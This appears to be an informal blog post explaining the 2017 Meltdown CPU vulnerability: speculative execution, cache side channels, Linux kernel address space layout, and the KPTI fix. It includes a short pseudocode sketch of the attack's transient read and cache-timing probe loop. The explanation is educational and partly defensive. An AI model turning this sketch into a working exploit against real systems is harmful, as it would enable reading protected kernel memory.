Meltdown
meltdown is super bug that took the world by storm in 2017, it's called meltdown because it melts the the boundary between the kernel and the applications. basically it breaks the most fundamental aspect of modern operating systems which is address space isolation, by default all processes have their own address spaces isolated from each other and from the operating system for obvious security reasons. meltdown exploits the need of modern cpus to get faster and faster sacrificng security in non obvious ways.
1. Hardware
modern cpus speed evolve more quickly than the memory speed, so cpus start getting clever to give better performance. so they uses a variaty of technics to compansate for the memory speed dificit. currently the bug affects most intel cpus and some of amd; there is also some variants in arm cpus. modern cpus are state of art when it comes to engineering they are built to perform really well; to do that the cpu uses many techniques like pipelines, caches, super scalar execution, branch prediction... . the pipline is used to keep a continous stream of instructions comming to cpus to be executed just like factories pipelines execution is split into many small steps (fetch, decode, execute, write back), but there is a small problem here about branch instructions, the cpu need to stall the pipeline until the branch instruction is executed and the next program counter is determined, then the pipeline can resume its execution, obviously this reduces cpu throughput (intructions per cycle), to mitigate that, the cpu predicts the next branch (as an example let's assume the prediction is: not taken) and keeps the pipeline going, the series of instructions after the branch are transiently executed in a virtual state, similar to Intel TSX (another problem with this transient execution is the absence of memory protection checks). later if the branch wasn't taken the temporary state gets committed into the actual cpu architectural state (isa) means it becomes visible to software, otherwise (branch taken) the result is thrown away and the pipeline is flushed. this all good the cpu runs at full speed, and software have no idea what happened. except that this transient execution affects the microarchitectural state like caches this should never have been a problem because the microarchitecture are not part of the isa and aren't exposed directly to software. but people quickly found that it's possible to leak data from cache through side channel attacks, by carefully measuring access time you could figure out if data is in cache or not.
2. Software
all systems that runs on x86 are susceptible to meltdown, but we gonna focus on linux because it's free software :), usually linux creates page tables for each new process and each page table represents an address space, the address space of every process is split into two the lower half is occupied by userspace, and the upper half by the kernel, so it's basically shared. this makes context switching between userspace and kernel space (syscalls, interrupts ...) a lot faster than if kernel has it's own separate address space, and change address spaces in every context switch. so the only real isolation between the kernel and userspace is access rights, linux kernel pages are accessible only by the supervisor wich is the kernel.
3. Meltdown Exploit
meltdown exploits the two highlighted points (feature-bug) from software and hardware, it works by tricking the cpu to speculate into a branch wich will not normally be taken, and in that not taken side of the branch we can have access to anywhere in virtual memory. this is still useless because even if the cpu speculates into our branch it will inevitably throw away the result so we can't have access for a long time. this is where the cache comes to play but it's not what you think, so basically we create a sufficiently large array that contains like 256(2^8 the number of possibilities in a byte) element, each element have the size of a cpu cache line (each memory access fills a cacheline). that array will be used to leak data to the outside world. in our dead branch we already accessed some forbidden data we use that data to reference an item in our crafted array (we do this one byte at a time) at this point data has been leaked we only need to guess what it is, by measuring the access time of our array's elements if the access was significantly faster compared to normal read from memory, then we conclude that the element is in the cpu cache so the leaked data is the element's index. we can read the entire address space like this, in x86_64 we can even read the entire physical memory because linux maps the physical ram into the range 0xffff888000000000-0xffffc87fffffffff.
a simple example would be like (pseudo code):
raise_exception();
// the line below is never reached
char data = read(illegal_address);
access(probe_array[data]);
then we probe the array:
for (int i = 0; i < sizeof(probe_array); i++) {
if (measure(probe_array[i]) < cache_access_treshold)
leaked_data = i;
}
4. Solution
the fundamental problem comes from the hardware's microarchitecture side effects. but cpus can't just be fixed quickly it will take a long time to get new generation of cpus that have the proper mitigations, so the solution is software based. in linux the implemented solution called kpti or kernel page table isolation, it basically seperates kernel and userspace page tables so everyone has it's own address space, this neutralizes the attack but makes the system a lot slower compared to how it was before as a side effect.
notice that the kernel remaps userspace pages into its own address space because it needs to access it. the userspace on the other hand doesn't have access to kernel pages at all.